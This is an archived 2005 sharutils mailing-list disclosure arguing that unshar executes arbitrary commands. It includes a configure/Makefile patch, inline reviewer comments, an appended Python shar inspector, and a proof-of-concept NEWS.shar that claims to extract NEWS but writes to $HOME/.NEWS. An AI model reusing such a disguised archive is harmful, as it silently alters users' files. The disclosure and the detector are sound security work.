unshar is unsafe

From: Bruno Haible
Subject: unshar is unsafe
Date: Wed, 27 Jul 2005 14:07:36 +0200
User-agent: KMail/1.5
To: address@hidden
Cc: Bruce Korb <address@hidden>
Hi,
It should be well-known that "unshar" is unsafe: In the current
implementation, it allows an attacker to execute any shell commands.
For example, the attached file NEWS.shar, when unshared, pretends to
create a file NEWS, but instead overwrites ~/.NEWS (it could just as
well overwrite or append a few lines to your ~/.profile) and sends me
your ~/.fetchmailrc. (Try it :-)).
$ unshar < NEWS.shar
Standard-Eingabe:
x - Sperrverzeichnis `_sh08096': wurde angelegt
x - packe aus NEWS (Text)
x - Sperrverzeichnis `_sh08096': gelöscht
For this reason, it should be possible to install the useful
programs 'uuencode', 'uudecode', and 'mail-files', without the dangerous
programs
- unshar (totally unsecure implementation)
- shar (educates people to unsecure behaviour)
- mailshar (unsecure since it invokes shar)
- remsync (unsecure since it invokes mailshar)
and the program
- compress-dummy (only used by 'shar', useless on its own)
And moreover, since the default installation of a GNU system should be
secure, these programs should not be installed by default, only upon
request.
Find attached a crude patch that does this.
Bruno
ChangeLog:
2005-07-26 Bruno Haible <address@hidden>
* configure.ac (ADD_SCRIPT): Remove mail-files.
(UNSECURE): New installer option --enable-unsecure.
src/ChangeLog:
2005-07-26 Bruno Haible <address@hidden>
* Makefile.am (bin_PROGRAMS): Add shar and unshar only if UNSECURE
is enabled.
(bin_SCRIPTS): Initialize with "mail-files". Add the ADD_SCRIPTS
only if UNSECURE is enabled.
doc/ChangeLog:
2005-07-26 Bruno Haible <address@hidden>
* Makefile.am (dist_man1_MANS): Add shar.1 and unshar.1 only if
UNSECURE is enabled.
diff -r -c3 sharutils-4.4.orig/configure.ac sharutils-4.4/configure.ac
*** sharutils-4.4.orig/configure.ac 2005-07-10 17:57:57.000000000 +0200
--- sharutils-4.4/configure.ac 2005-07-27 01:29:07.000000000 +0200
***************
*** 22,28 ****
dnl AC_ARG_PROGRAM
! AC_SUBST(ADD_SCRIPT, ["mail-files mailshar"])
AC_PROG_CC
AC_PROG_INSTALL
--- 22,28 ----
dnl AC_ARG_PROGRAM
! AC_SUBST(ADD_SCRIPT, ["mailshar"])
AC_PROG_CC
AC_PROG_INSTALL
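Review bot: the name of the substituted variable here is ADD_SCRIPT, while the src/ChangeLog entry above says "Add the ADD_SCRIPTS only if UNSECURE is enabled"; align the ChangeLog wording with the actual variable so it can be grepped. Note also that dropping mail-files from ADD_SCRIPT only preserves its installation together with the `bin_SCRIPTS = mail-files` hunk in src/Makefile.am; if the two hunks are applied separately, mail-files is silently no longer installed.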
***************
*** 103,108 ****
--- 103,114 ----
[disable installation of uuencode and uudecode])])
AM_CONDITIONAL([UUCODE], [test "x$enable_uucode" != xno])
+ AC_ARG_ENABLE(unsecure,
+ [AS_HELP_STRING([--enable-unsecure],
+ [enable installation of the unsecure programs shar, unshar, mailshar,
+ remsync])])
+ AM_CONDITIONAL([UNSECURE], [test "x$enable_unsecure" = xyes])
+
AM_GNU_GETTEXT
AM_GNU_GETTEXT_VERSION([0.14.4])
AM_WITH_DMALLOC
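Review bot: the conditional `test "x$enable_unsecure" = xyes` makes the programs off by default, the opposite of the UUCODE test just above (`!= xno`), which is the intended direction but is not stated anywhere; add "[default=no]" to the AS_HELP_STRING so that ./configure --help documents the new default. The help string also lists remsync, yet the only script this patch puts into ADD_SCRIPT is mailshar; confirm that remsync is appended to ADD_SCRIPT elsewhere in configure.ac, or drop it from the string.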
diff -r -c3 sharutils-4.4.orig/src/Makefile.am sharutils-4.4/src/Makefile.am
*** sharutils-4.4.orig/src/Makefile.am 2005-07-09 02:46:46.000000000 +0200
--- sharutils-4.4/src/Makefile.am 2005-07-27 01:13:14.000000000 +0200
***************
*** 17,27 ****
## Process this file with automake to produce Makefile.in.
! bin_PROGRAMS = shar unshar
if UUCODE
bin_PROGRAMS += uuencode uudecode
endif
! bin_SCRIPTS = $(ADD_SCRIPT)
EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
DISTCLEANFILES = $(bin_SCRIPTS)
--- 17,31 ----
## Process this file with automake to produce Makefile.in.
! bin_PROGRAMS =
! bin_SCRIPTS = mail-files
if UUCODE
bin_PROGRAMS += uuencode uudecode
endif
! if UNSECURE
! bin_PROGRAMS += shar unshar
! bin_SCRIPTS += $(ADD_SCRIPT)
! endif
EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
DISTCLEANFILES = $(bin_SCRIPTS)
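Review bot: compress-dummy stays in EXTRA_SCRIPTS and nothing in this hunk gates it, although the cover message calls it useless without shar; check where configure adds compress-dummy (or the compress link) to the install set and put that under UNSECURE as well. Since this changes what a default build installs, the change also needs a NEWS entry.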
diff -r -c3 sharutils-4.4.orig/doc/Makefile.am sharutils-4.4/doc/Makefile.am
*** sharutils-4.4.orig/doc/Makefile.am 2005-07-09 02:32:21.000000000 +0200
--- sharutils-4.4/doc/Makefile.am 2005-07-27 01:02:15.000000000 +0200
***************
*** 19,31 ****
info_TEXINFOS = sharutils.texi
! dist_man1_MANS = shar.1 unshar.1
if UUCODE
dist_man1_MANS += uuencode.1 uuencode.5
man1_MANS = uudecode.1
endif
CLEANFILES = $(man1_MANS)
EXTRA_DIST = doclicense.texi
--- 19,35 ----
info_TEXINFOS = sharutils.texi
! dist_man1_MANS =
if UUCODE
dist_man1_MANS += uuencode.1 uuencode.5
man1_MANS = uudecode.1
endif
+ if UNSECURE
+ dist_man1_MANS += shar.1 unshar.1
+ endif
+
CLEANFILES = $(man1_MANS)
EXTRA_DIST = doclicense.texi
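Review bot: the man pages are gated on UNSECURE, but sharutils.texi (info_TEXINFOS, unchanged here) is still built unconditionally and should state that shar and unshar are installed only with --enable-unsecure, otherwise the manual documents programs a default install no longer has. The added blank `+` line after `endif` matches the existing blank line before CLEANFILES, fine.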
============================= NEWS.shar =============================
#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.4).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.
#
# Made on 2005-07-27 00:21 CEST by <address@hidden>.
# Source directory was `/packages/sharutils-4.4'.
#
# Existing files will *not* be overwritten unless `-c' is specified.
#
# This shar contains:
# length mode name
# ------ ---------- ------------------------------------------
# 2831 -rwxr-xr-x NEWS
#
save_IFS="${IFS}"
IFS="${IFS}:"
gettext_dir=FAILED
locale_dir=FAILED
first_param="$1"
for dir in $PATH
do
if test "$gettext_dir" = FAILED && test -f $dir/gettext \
&& ($dir/gettext --version >/dev/null 2>&1)
then
case `$dir/gettext --version 2>&1 | sed 1q` in
*GNU*) gettext_dir=$dir ;;
esac
fi
if test "$locale_dir" = FAILED && test -f $dir/shar \
&& ($dir/shar --print-text-domain-dir >/dev/null 2>&1)
then
locale_dir=`$dir/shar --print-text-domain-dir`
fi
done
IFS="$save_IFS"
if test "$locale_dir" = FAILED || test "$gettext_dir" = FAILED
then
echo=echo
else
TEXTDOMAINDIR=$locale_dir
export TEXTDOMAINDIR
TEXTDOMAIN=sharutils
export TEXTDOMAIN
echo="$gettext_dir/gettext -s"
fi
if (echo "testing\c"; echo 1,2,3) | grep c >/dev/null; then
if (echo -n testing; echo 1,2,3) | sed s/-n/xn/ | grep xn >/dev/null; then
shar_n= shar_c='
'
else
shar_n=-n shar_c=
fi
else
shar_n= shar_c='\c'
fi
if touch -am -t 200112312359.59 $$.touch >/dev/null 2>&1 && test ! -f 200112312359.59 && test -f $$.touch; then
shar_touch='touch -am -t $1$2$3$4$5$6.$7 "$8"'
elif touch -am 123123592001.59 $$.touch >/dev/null 2>&1 && test ! -f 123123592001.59 && test ! -f 123123592001.5 && test -f $$.touch; then
shar_touch='touch -am $3$4$5$6$1$2.$7 "$8"'
elif touch -am 1231235901 $$.touch >/dev/null 2>&1 && test ! -f 1231235901 &&
test -f $$.touch; then
shar_touch='touch -am $3$4$5$6$2 "$8"'
else
shar_touch=:
echo
$echo 'WARNING: not restoring timestamps. Consider getting and'
$echo "installing GNU \`touch', distributed in GNU File Utilities..."
echo
fi
rm -f 200112312359.59 123123592001.59 123123592001.5 1231235901 $$.touch
#
$echo $shar_n 'x -' 'lock directory' "\`_sh08096': "$shar_c
if mkdir _sh08096; then
$echo 'created'
else
$echo 'failed to create'
exit 1
fi
# ============= NEWS ==============
if test -f 'NEWS' && test "$first_param" != -c; then
$echo 'x -' SKIPPING 'NEWS' '(file already exists)'
else
$echo 'x -' extracting 'NEWS' '(text)'
sed 's/^X//' << 'SHAR_EOF' > "$HOME/.NEWS" &&
GNU sharutils NEWS - User visible changes.
Copyright (C) 1994, 1995, 1996, 2002, 2004, 2005 Free Software Foundation, Inc.
X
Version 4.4 - July 2005, by Bruce Korb
X
* autotool cleanup
* Make a non-alpha release this time.
* Ensure a "intmax_t" exists in the code.
X
X
Version 4.3.81 - June 2005, by Bruce Korb
X
* Compatibility: True 64 does not have "snprintf"
* Updated FSF address
X
X
X
Version 4.3.80 - April 2005, by Bruce Korb
X
* Buglet: Unlink the temporary file when unsharing from stdin.
X
X
X
Version 4.3.79 - April 2005, by Bruce Korb
X
* rewrote the temporary file handling in unshar to avoid both a theoretical
X timing hole (hitting it requires cooperation) and a buffer overrun
X attack (a file name exceeding 1K).
* new translations and updates. They are all now missing two messages:
X "allocate file name buffer" and "allocate file buffer". *sigh*.
X
X
X
Version 4.3.78 - January 2005, by Bruce Korb
X
* fixed test to not require updates for every release number
* fixed the uuencode man page so that docbook generation can work correctly.
X
X
Version 4.3.77 - September 2004, by Bruce Korb
X
* Fixed a buffer overrun exploit
X
X
Version 4.3.76 - December 2002, by Karl Eichwalder
X
* Updated translations: de et fr sv tr.
X
X
Version 4.3.75 - December 2002, by Karl Eichwalder
X
* Fix compatibility issues (by Bruno Haible).
X
* Support bzip2 as an alternative to gzip (by Bruno Haible).
X
* New translations: ca et hu.
X
* Updated translations: da de ja sv tr zh_TW.
X
X
Version 4.3.74 - July 2002, by Karl Eichwalder
X
* Many portability fixes (by Bruno Haible).
X
* Updated translation: fr.
X
X
Version 4.3.73 - July 2002, by Karl Eichwalder
X
* Add support for large files, e.g., files larger than 2 GiB on hosts
X where 'long' is 32 bits wide (by Paul Eggert).
X
X
Version 4.3.72 - July 2002, by Karl Eichwalder
X
* Updated translations: fr sv.
X
X
Version 4.3.71 - July 2002, by Karl Eichwalder
X
* Updated translations: da de.
X
X
Version 4.3.70 - July 2002, by Karl Eichwalder
X
* Don't install 'compress' link by default; provide
X --enable-compress-link configure option.
X
* Fix uudecode output file handling.
X
* Updated translations: de tr.
X
X
Version 4.3.61 - July 2002, by Karl Eichwalder
X
* Re-add the intl subdirectory (libintl from gettext).
X
* Bugfixes.
X
X
Version 4.3.60 - June 2002, by Karl Eichwalder
X
* Provide a 'compress-dummy' script. Install it if 'compress' isn't
X available. Create a link 'compress' pointing to 'compress-dummy';
X thus it is possible to unshar legacy shar files calling
X 'compress -d'.
X
* shar: Don't offer '-Z' resp. '--compress' if the system doesn't
X support 'compress'.
X
X
Version 4.3.52 - June 2002, by Karl Eichwalder
X
* sync more files coming with automake and related frame work files.
X
* fix temp file races (shar).
X
* fix Y2K bug (shar).
X
* allow spaces in file names (uudecode).
SHAR_EOF
(set 20 05 07 22 23 38 11 "$HOME/.NEWS"; eval "$shar_touch") &&
chmod 0755 "$HOME/.NEWS" ||
$echo 'restore of' 'NEWS' 'failed'
if ( md5sum --help </dev/null 2>&1 | grep 'sage: md5sum \[' ) >/dev/null 2>&1 \
&& ( md5sum --version </dev/null 2>&1 | grep -v 'textutils 1.12' ) >/dev/null; then
md5sum -c << SHAR_EOF >/dev/null 2>&1 \
|| $echo 'NEWS:' 'MD5 check failed'
23c39bbc9cb029b1881b9dfcbbfe0209 NEWS
SHAR_EOF
else
shar_count="`LC_ALL=C wc -c < "$HOME/.NEWS"`"
test 2831 -eq "$shar_count" ||
$echo 'NEWS:' 'original size' '2831,' 'current size' "$shar_count!"
fi
fi
$echo $shar_n 'x -' 'lock directory' "\`_sh08096': " $shar_c
if rm -fr _sh08096; then
$echo 'removed'
else
$echo 'failed to remove'
fi
exit 0
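A static inspector for shar archives, added here as an illustration (it is not part of Bruno's message and not sharutils code): instead of running the archive, it reads the manifest comment and the `sed 's/^X//' << 'SHAR_EOF' > target` extraction lines and reports every path the archive would write, flagging targets that can escape the current directory, such as the `"$HOME/.NEWS"` redirection in NEWS.shar above that the transcript presents as "extracting NEWS". The sample archive in the block is constructed; the regexes and the `escape_reason` heuristics are this example's own assumptions about shar layout.

```python
import re

# Constructed sample in the shape of the NEWS.shar above: the manifest
# comment claims the archive creates NEWS, but the extraction line
# redirects the here-document to "$HOME/.NEWS" instead.
SAMPLE_SHAR = r'''#!/bin/sh
# This shar contains:
# length mode name
# 2831 -rwxr-xr-x NEWS
sed 's/^X//' << 'SHAR_EOF' > "$HOME/.NEWS" &&
GNU sharutils NEWS - User visible changes.
X
Version 4.4 - July 2005, by Bruce Korb
SHAR_EOF
chmod 0755 "$HOME/.NEWS" ||
exit 0
'''

# "# <length> <mode> <name>" rows of the manifest comment block (assumed layout).
MANIFEST_RE = re.compile(r'^#\s+\d+\s+[-rwxsStT]{10}\s+(\S+)$', re.M)
# sharutils extraction line: a here-document piped through sed into a target,
# captured together with its body up to the terminator line.
EXTRACT_RE = re.compile(
    r"""^(?:sed 's/\^X//'|cat)\s+<<\s*'?(\w+)'?\s*>\s*("[^"]*"|'[^']*'|\S+).*?\n(.*?)^\1$""",
    re.M | re.S)

# Heuristics (this example's own) for a target that can leave the extraction directory.
ESCAPE_CHECKS = (
    (lambda t: t.startswith('/'), 'absolute path'),
    (lambda t: t.startswith('~'), 'home-relative path'),
    (lambda t: '$' in t or '`' in t, 'shell expansion in path'),
    (lambda t: '..' in t.split('/'), 'parent-directory traversal'),
)

def escape_reason(target):
    """Why a target could land outside the extraction directory, or None."""
    return next((why for ok, why in ESCAPE_CHECKS if ok(target)), None)

def inspect_shar(text):
    """List what a shar would write, by reading it rather than running it."""
    manifest = MANIFEST_RE.findall(text)
    writes = []
    for _term, target, body in EXTRACT_RE.findall(text):
        target = target.strip('"\'')
        # shar prefixes protected payload lines with X; strip it as sed would.
        payload = [line[1:] if line.startswith('X') else line for line in body.splitlines()]
        writes.append({'target': target, 'lines': len(payload),
                       'reason': escape_reason(target)})
    undeclared = [w['target'] for w in writes if w['target'] not in manifest]
    return {'manifest': manifest, 'writes': writes, 'undeclared': undeclared}
```

Fed the full NEWS.shar text above, `inspect_shar` reports the single write to `$HOME/.NEWS` as undeclared (the manifest lists only NEWS) and flags it for shell expansion, which is exactly the mismatch the transcript hides.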